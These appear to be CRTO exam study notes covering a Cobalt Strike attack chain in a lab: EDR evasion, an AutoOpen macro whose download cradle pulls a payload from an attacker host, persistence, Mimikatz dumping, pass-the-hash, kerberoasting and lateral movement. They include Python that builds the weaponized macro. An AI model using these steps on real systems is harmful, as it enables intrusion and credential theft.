CRTO & Cobalt Strike
This page contains the notes needed to pass the CRTO exam, along with the lab instructions.
Setting Up Cobalt Strike on a Windows Machine
To start Cobalt Strike we need two things:
Team Server (this only runs on a Linux machine)
Cobalt Strike Client (this can run on the Windows machine)
Setting Up the Team Server
First we need a Linux box on which the team server will run. I already have one, so I open the Linux VM from the Windows machine and run the team server:
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
10.10.5.50 is the IP address of the attacker's Linux VM.
Passw0rd! is the shared password used to connect from the Cobalt Strike client.
webbug.profile is an example Malleable C2 profile (covered in more detail later).

The team server is now running, so the next step is to start the Cobalt Strike client.
Starting the Cobalt Strike Client
After the team server is up, launch the Cobalt Strike client and fill in the connection details:

Alias can be any label for this team server profile
Host should be the IP address of the machine where the team server is running
User can be any name; it is the operator name other users of the team server will see
Password must be the same one that was passed to the teamserver command

Listeners in Cobalt Strike
We can set up listeners in Cobalt Strike by pressing the headphones button in the toolbar.

Now click the Add button at the bottom to add listeners. The types we will use are:
http
dns
https
smb
Below is an example of the HTTP listener:

All the other listeners are set up in the same way.
SMB Listener
For the SMB listener we can list the named pipes that already exist on our own system and pick one of those names, so the Beacon pipe blends in with legitimate ones. We do not use the Cobalt Strike default pipe name, because it is a well-known signature that AV and EDR products detect.

Any of the pipe names above can be used when setting up the listener.
All Listeners setup done

Running Cobalt Strike As a Service
We can run the team server as a systemd service so that it starts automatically when the Linux machine boots and we do not have to run it by hand every time.
First, create a unit file in /etc/systemd/system:
sudo nano /etc/systemd/system/teamserver.service
Then add the following content to it:
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
[Install]
WantedBy=multi-user.target

Now reload the system manager so it picks up the new unit:
sudo systemctl daemon-reload
Check the status of the service we created (it will show as inactive until it is started):
sudo systemctl status teamserver.service

Start the service:
sudo systemctl start teamserver.service
And enable it so it starts at boot:
sudo systemctl enable teamserver.service
From now on the team server starts automatically every time the Linux machine boots. One caveat: the shared password sits in the ExecStart line, so anyone who can read the unit file or list processes on this box (ps, or systemctl status) can see it. Keep the team server host locked down, and consider moving the password into a root-only EnvironmentFile= and referencing it from ExecStart as a variable.

Generating All Payloads using Cobalt Strike
We can generate every payload type at once; I choose the last option, Windows Stageless Generate All Payloads.


All the payloads are written to C:\Payloads.

Creating Macro With Cobalt Strike
Open Word and go to View -> Macros, type a name for the macro and click Create.
Make sure the macro is named AutoOpen and that Document1 is selected in the "Macros in" drop-down, so the macro is stored in this document and runs automatically when it is opened.

Now a small piece of code that opens Notepad, to confirm the macro runs:
Sub AutoOpen()
    ' AutoOpen runs automatically when the document is opened
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    ' Launch notepad.exe as a quick test that the macro executes
    Shell.Run "notepad"
End Sub
Save the macro and run it; Notepad should appear.


Macro For a Reverse Shell in Cobalt Strike
Now I use Cobalt Strike's Scripted Web Delivery (under the Attacks menu) to host a payload and get a Beacon back.


The payload is now hosted and Cobalt Strike gives us the following one-liner, the download cradle we will embed in the macro:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"

The final macro is shown below. Note that a double quote inside a VBA string literal is written as two double quotes, which is why the -c argument is wrapped in "" ... """:
Sub AutoOpen()
    Dim Shell As Object
    Set Shell = CreateObject("wscript.shell")
    ' -nop: no profile, -w hidden: no visible window; the cradle downloads and runs the hosted payload
    Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"""
End Sub

In Site Management we can see the hosted file and that the web server is listening on port 80.

Once a user opens the document and the macro runs, the cradle pulls the payload over HTTP and a new Beacon checks in to Cobalt Strike.

Cobalt Strike Commands
ps ----> list processes, so we can spot AV or endpoint protection processes before doing anything noisy
execute-assembly ----> run a .NET assembly in memory, e.g. execute-assembly seatbelt.exe -group=system (this is for .NET assemblies only, not arbitrary native executables)
screenshot ----> take a screenshot
keylogger ----> record what the target is typing
clipboard ----> show what the user has copied to the clipboard (text only, not images)
net logons ----> show which users are logged on to the system
Persistence Techniques
Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.
If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.
Common userland persistence methods include:
HKCU / HKLM Registry Autoruns
Scheduled Tasks
Startup Folder
Cobalt Strike doesn't include any built-in commands specifically for persistence. SharPersist is a Windows persistence toolkit written by FireEye. It's written in C#, so it can be executed via execute-assembly.
Persistence using Task Scheduler
The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.
First, convert the PowerShell download cradle to Base64 so we don't have to fight with double quotes and special characters in the task's arguments. PowerShell's -enc switch expects the Base64 of the UTF-16LE encoded string, which is why the Unicode encoding is used below:
$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
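The quote-doubling used in the macro section and the -enc encoding used here are easy to get subtly wrong (Base64 of UTF-8 bytes, for instance, will not run). The following Python is an added example, not course material, and not Cobalt Strike or SharPersist code: it produces both the encoded launcher and the AutoOpen macro from a cradle string. The cradle strings and the expected encoded value are taken from this page; the function names are my own.

```python
import base64

# Download cradle from this page (the one encoded for the schtask persistence)
CRADLE = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'

# The -c form used in the macro section: single quotes inside, so only the outer
# double quotes need doubling when it is placed in a VBA string literal
MACRO_COMMAND = ("powershell.exe -nop -w hidden -c "
                 "\"IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))\"")


def encode_powershell_command(command: str) -> str:
    """Value for powershell.exe -EncodedCommand (-enc).

    PowerShell decodes the argument as Base64 over UTF-16LE text, which is why the
    page uses [System.Text.Encoding]::Unicode; Base64 over UTF-8 bytes is rejected.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded: str) -> str:
    """Inverse of the above, e.g. to read an -enc blob found in a log or a scheduled task."""
    return base64.b64decode(encoded).decode("utf-16-le")


def powershell_launcher(command: str) -> str:
    """Launcher line with no quotes or special characters in the argument list."""
    return f"powershell.exe -nop -w hidden -enc {encode_powershell_command(command)}"


def vba_string_literal(text: str) -> str:
    """VBA escapes a double quote inside a string literal by doubling it."""
    return '"' + text.replace('"', '""') + '"'


def vba_autoopen_macro(command_line: str) -> str:
    """AutoOpen macro body that runs command_line through WScript.Shell, as on this page."""
    return "\n".join([
        "Sub AutoOpen()",
        "    Dim Shell As Object",
        '    Set Shell = CreateObject("wscript.shell")',
        f"    Shell.Run {vba_string_literal(command_line)}",
        "End Sub",
    ])


if __name__ == "__main__":
    print(powershell_launcher(CRADLE))
    print(vba_autoopen_macro(MACRO_COMMAND))
    # The -enc form also works inside the macro and needs no quote escaping at all
    print(vba_autoopen_macro(powershell_launcher(CRADLE)))
```

Running it prints the same -enc string that appears in the SharPersist command below and the same Shell.Run line as the macro section. Defenders can use decode_powershell_command on any -enc argument seen in a scheduled task or Run key to see what it actually does.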

Now use SharPersist to create an hourly scheduled task named Updater that runs the encoded command:
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly

We can confirm on the target by opening Task Scheduler and looking for the Updater task.

Persistence Using Startup Folder
Applications, files and shortcuts within a user's startup folder are launched automatically when that user logs in. It's commonly used to bootstrap the user's environment (set wallpapers, shortcuts, etc.).
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

We can check the startup folder on the target machine to confirm:
C:\Users\Programmerboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Persistence Using Registry AutoRuns
AutoRun (Run key) values in HKCU and HKLM allow applications to start at logon: HKCU for the current user only, HKLM for every user on the machine. You commonly see these used to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.
For this we need to upload our executable to the target machine and then add a Run value pointing at it, so it runs at every logon:

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Mimikatz in Cobalt Strike
Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:
beacon> mimikatz token::elevate
beacon> mimikatz lsadump::sam
Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon:
beacon> mimikatz token::elevate ; lsadump::sam
The ! prefix elevates Beacon to SYSTEM before running the given command, which is useful when you're running in a high-integrity context but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:
beacon> mimikatz !lsadump::sam
NTLM Hashes
beacon> mimikatz !sekurlsa::logonpasswords
We can also use the shorthand Beacon command for this:
logonpasswords

Kerberos Encryption keys
beacon> mimikatz !sekurlsa::ekeys

SAM File
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
beacon> mimikatz !lsadump::sam

Domain Cached Creds
Windows caches the credentials of domain users who have logged on so they can still log on when no domain controller is reachable. Unfortunately, the hash format (MsCacheV2, also called DCC2) is not NTLM, so it can't be used for pass the hash. The only viable use for these is to crack them offline.
The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.
mimikatz !lsadump::cache
To crack these with hashcat (mode 2100), we need to transform them into the expected format. The hashcat example hashes page shows it should be $DCC2$<iterations>#<username>#<hash>.
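Reformatting the mimikatz output by hand is error-prone once there are several cached entries. As an added example (my own code, not part of the course or of mimikatz), the Python below parses a constructed lsadump::cache output with made-up hashes, picks up the iteration count printed by mimikatz, strips the DOMAIN\ prefix and emits hashcat mode 2100 lines. The regexes assume the line labels shown in the sample (User, MsCacheV2, "Iteration is set to"); adjust them if your mimikatz build prints differently. The username is lowercased because MsCacheV2 salts the hash with the lowercased username.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `mimikatz !lsadump::cache` output; hashes and SIDs are made up.
SAMPLE_OUTPUT = """\
Domain : WKSTN-1
SysKey : 0123456789abcdef0123456789abcdef

Local name : WKSTN-1 ( S-1-5-21-1-2-3 )
Domain name : DEV ( S-1-5-21-4-5-6 )
Domain FQDN : dev.cyberbotic.io

* Iteration is set to default (10240)

[NL$1 - 3/11/2021 11:14:41 AM]
RID       : 00000450 (1104)
User      : DEV\\jking
MsCacheV2 : 7a98ec8c1c7b1e3fd1c8b37a8db6c18f

[NL$2 - 3/12/2021 09:02:17 AM]
RID       : 00000451 (1105)
User      : DEV\\NLamb
MsCacheV2 : 1F0A3B5C7D9E2F4A6B8C0D1E2F3A4B5C
"""

ITERATIONS_RE = re.compile(r"Iteration is set to (?:default )?\((\d+)\)")
USER_RE = re.compile(r"^User\s*:\s*(?:(?P<domain>[^\\\s]+)\\)?(?P<user>\S+)")
HASH_RE = re.compile(r"^MsCacheV2\s*:\s*([0-9a-fA-F]{32})")


@dataclass
class CachedCredential:
    domain: str
    username: str
    dcc2: str
    iterations: int

    def hashcat_line(self) -> str:
        # hashcat -m 2100 format. MsCacheV2 is salted with the lower-cased username,
        # so normalise the name (and the hex) before writing the line out.
        return f"$DCC2${self.iterations}#{self.username.lower()}#{self.dcc2.lower()}"


def parse_lsadump_cache(text: str, default_iterations: int = 10240) -> list[CachedCredential]:
    """Walk the mimikatz output and pair each User line with the MsCacheV2 line after it."""
    match = ITERATIONS_RE.search(text)
    iterations = int(match.group(1)) if match else default_iterations
    creds: list[CachedCredential] = []
    domain, user = "", ""
    for line in text.splitlines():
        if (m := USER_RE.match(line)):
            domain, user = m.group("domain") or "", m.group("user")
            continue
        if user and (m := HASH_RE.match(line)):
            creds.append(CachedCredential(domain, user, m.group(1), iterations))
            user = ""  # one hash per entry; never pair a stale user with a later hash
    return creds


def to_hashcat_file(creds: list[CachedCredential]) -> str:
    """Contents of the file to pass to: hashcat -m 2100 hashes.txt wordlist"""
    return "\n".join(c.hashcat_line() for c in creds) + "\n"


if __name__ == "__main__":
    print(to_hashcat_file(parse_lsadump_cache(SAMPLE_OUTPUT)), end="")
```

Paste the real Beacon output into SAMPLE_OUTPUT (or read it from a file) and feed the result to hashcat -m 2100. Expect DCC2 cracking to be slow: the 10240 PBKDF2 iterations are the point of the format, so only weak or wordlist passwords are realistic targets.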
Extracting Kerberos Tickets
One unfortunate consequence of the aforementioned techniques is that they open handles to sensitive resources such as LSASS, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuse, using legitimate Windows APIs.
Its triage command will list all the Kerberos tickets in your current logon session and, if elevated, from all logon sessions on the machine.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Rubeus' dump command will extract these tickets from memory; because it uses Windows APIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.
For example, if we only wanted the TGT for jking, we can do:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
DCSync
The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC. It requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain, which by default only Domain Admins, Enterprise Admins and domain controller accounts hold.
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
Domain Reconnaissance
Powerview
First we import it into memory, so the script never touches disk. The powershell command below spawns powershell.exe; powerpick runs the same cmdlets through unmanaged PowerShell and is quieter:
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
We can run the following Commands to Enumerate the Domain
To Get Information about the domain
beacon> powershell Get-Domain
Returns the domain controllers for the current or specified domain.
beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl
Returns all domains for the current forest or the forest specified by -Forest.
beacon> powershell Get-ForestDomain
Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.
beacon> powershell Get-DomainPolicyData | select -expand SystemAccess
Return all (or specific) user(s). To only return specific properties, use -Properties. By default, all user objects for the current domain are returned; use -Identity to return a specific user.
beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl
Return all computers or specific computer objects.
beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
Search for all organization units (OUs) or specific OU objects.
beacon> powershell Get-DomainOU -Properties Name | sort -Property Name
Return all domain groups or specific domain group objects.
beacon> powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Return the members of a specific domain group.
beacon> powershell Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use -ComputerIdentity.
beacon> powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.
beacon> powershell Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.
beacon> powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Return all domain trusts for the current or specified domain
beacon> powershell Get-DomainTrust
User Impersonation
Pass The Hash Attack
If we have the NTLM hash of a user we can use Cobalt Strike's pth command to perform a pass the hash attack. After passing the hash, listing the C$ share of another computer is a quick test of whether the impersonation works and whether that user has local admin rights there.
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
Pass the Ticket
Rubeus ptt injects a ticket into a logon session. The /luid parameter (which needs elevation) targets a specific session; without it the ticket goes into the current one.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
Lateral Movement
Moving laterally between computers in a domain is important for accessing sensitive information/materials and obtaining new credentials. Cobalt Strike provides several strategies for executing Beacons/code/commands on remote targets; the two used here are below.
The first and most convenient is the built-in jump command. The syntax is jump [method] [target] [listener]; type jump on its own to see the list of methods. This spawns a Beacon payload on the remote target and, if using a P2P listener, connects to it automatically.
The second is the built-in remote-exec command. The syntax is remote-exec [method] [target] [command]; type remote-exec on its own to see the list of methods. Unlike jump, it only runs a command on the target, so getting a Beacon payload onto the host is up to you.
Each of these strategies is compatible with the techniques described in the User Impersonation chapter. For example, you can use pth to impersonate a user and then jump to move laterally.
Remote-exec
beacon> remote-exec winrm web.dev.cyberbotic.io whoami
Jump
beacon> jump winrm64 web.dev.cyberbotic.io smb
beacon> jump psexec64 web.dev.cyberbotic.io smb
beacon> jump psexec_psh web smb
Kerberoasting Using Cobalt Strike
We can use Rubeus to find kerberoastable users and request their TGSs. The command below requests a ticket for every account that has an SPN and prints the hashes in crackable form:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
A much safer approach is to enumerate possible candidates first and roast them selectively; a blanket kerberoast requests a ticket for every SPN account, including honeypot accounts that defenders monitor. This LDAP query will find domain users who have an SPN set.
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
Now we can target a specific user for kerberoasting using the /user parameter:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
AS-REP Roasting Using Cobalt Strike
If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.
As with kerberoasting, we don't want to AS-REP roast every account in the domain. This query finds users with the DONT_REQ_PREAUTH flag (4194304) set in userAccountControl:
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
We can then use Rubeus to AS-REP roast only the user squid_svc:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
Unconstrained delegation using Cobalt strike
This query returns all computers that are permitted for unconstrained delegation (the TRUSTED_FOR_DELEGATION flag, 524288, in userAccountControl). Note that domain controllers have this flag set by default, so they always appear in the results.
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
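The two ADSearch filters above (and the kerberoasting one) differ only in the object category and the userAccountControl bit they test; the OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule. As an added example that is not part of the course material or of ADSearch, the Python below builds those filters from named flags, decodes a raw userAccountControl value, and applies the same bit test to a constructed set of directory objects so the selection logic can be checked offline. The sample objects, their UAC values and the helper names are my own. It handles two things the raw queries do not: domain controllers always carry TRUSTED_FOR_DELEGATION, so they are separated out, and disabled accounts are dropped since they are not worth roasting.

```python
from __future__ import annotations

# userAccountControl flags (MS-SAMR); only the ones relevant to these queries
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # 524288: unconstrained delegation
    "DONT_REQ_PREAUTH": 0x400000,                 # 4194304: AS-REP roastable
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # 16777216: constrained, protocol transition
}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed sample directory: (samAccountName, objectCategory, userAccountControl, SPNs).
# The UAC values are realistic combinations, e.g. 0x82000 is the default for a DC.
SAMPLE_OBJECTS = [
    {"samAccountName": "DC01$", "objectCategory": "computer", "userAccountControl": 0x82000, "servicePrincipalName": ["ldap/dc01"]},
    {"samAccountName": "WEB$", "objectCategory": "computer", "userAccountControl": 0x81000, "servicePrincipalName": ["HOST/web"]},
    {"samAccountName": "WKSTN-1$", "objectCategory": "computer", "userAccountControl": 0x1000, "servicePrincipalName": ["HOST/wkstn-1"]},
    {"samAccountName": "jking", "objectCategory": "user", "userAccountControl": 0x200, "servicePrincipalName": []},
    {"samAccountName": "squid_svc", "objectCategory": "user", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"samAccountName": "mssql_svc", "objectCategory": "user", "userAccountControl": 0x10200, "servicePrincipalName": ["MSSQLSvc/sql-2:1433"]},
    {"samAccountName": "old_svc", "objectCategory": "user", "userAccountControl": 0x400202, "servicePrincipalName": []},
]


def uac_filter(object_category: str, flag: str, exclude_disabled: bool = False) -> str:
    """LDAP filter like the ADSearch ones on this page, optionally minus disabled accounts."""
    bit = UAC_FLAGS[flag]
    clauses = [f"(objectCategory={object_category})",
               f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bit})"]
    if exclude_disabled:
        clauses.append(f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UAC_FLAGS['ACCOUNTDISABLE']}))")
    return "(&" + "".join(clauses) + ")"


def spn_filter() -> str:
    """Kerberoasting candidates: user objects with at least one SPN."""
    return "(&(objectCategory=user)(servicePrincipalName=*))"


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a raw userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def match_uac(objects, object_category: str, flag: str, exclude_disabled: bool = True) -> list[str]:
    """What the DC does with the bit-AND rule: keep objects whose UAC has the bit set."""
    bit, disabled = UAC_FLAGS[flag], UAC_FLAGS["ACCOUNTDISABLE"]
    return [o["samAccountName"] for o in objects
            if o["objectCategory"] == object_category
            and o["userAccountControl"] & bit
            and not (exclude_disabled and o["userAccountControl"] & disabled)]


def unconstrained_hosts(objects) -> tuple[list[str], list[str]]:
    """Split unconstrained-delegation computers into (domain controllers, everything else)."""
    names = match_uac(objects, "computer", "TRUSTED_FOR_DELEGATION")
    by_name = {o["samAccountName"]: o for o in objects}
    dcs = [n for n in names if by_name[n]["userAccountControl"] & UAC_FLAGS["SERVER_TRUST_ACCOUNT"]]
    return dcs, [n for n in names if n not in dcs]


def kerberoastable(objects) -> list[str]:
    """Enabled user accounts that have an SPN, i.e. what spn_filter() would return."""
    return [o["samAccountName"] for o in objects
            if o["objectCategory"] == "user" and o["servicePrincipalName"]
            and not o["userAccountControl"] & UAC_FLAGS["ACCOUNTDISABLE"]]


if __name__ == "__main__":
    print(uac_filter("user", "DONT_REQ_PREAUTH", exclude_disabled=True))
    print(uac_filter("computer", "TRUSTED_FOR_DELEGATION"))
    print("AS-REP roastable:", match_uac(SAMPLE_OBJECTS, "user", "DONT_REQ_PREAUTH"))
    print("unconstrained (DCs, others):", unconstrained_hosts(SAMPLE_OBJECTS))
    print("kerberoastable:", kerberoastable(SAMPLE_OBJECTS))
    print("squid_svc UAC:", decode_uac(0x400200))
```

The exclude_disabled filter variant is the one to hand to ADSearch in practice: it adds (!(userAccountControl:1.2.840.113556.1.4.803:=2)) so disabled accounts never reach Rubeus. In real LDAP results objectCategory is a full DN rather than the short name used in the sample; the filter shorthand objectCategory=user still works because AD resolves it.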
Rubeus triage will show all the tickets that are currently cached. TGTs can be identified by the krbtgt service.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
We can simply extract this TGT and leverage it via a new logon session.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
Microsoft Defender and Bypass
Command to list what Defender has detected
# In PowerShell
Get-MpThreatDetection | Sort-Object InitialDetectionTime | Select-Object -First 5
Get-MpThreatDetection returns Defender's detection history, including the path of the flagged file and the threat ID. Sorted like this, the first 5 are the oldest detections; add -Descending to Sort-Object to see the most recent ones first.
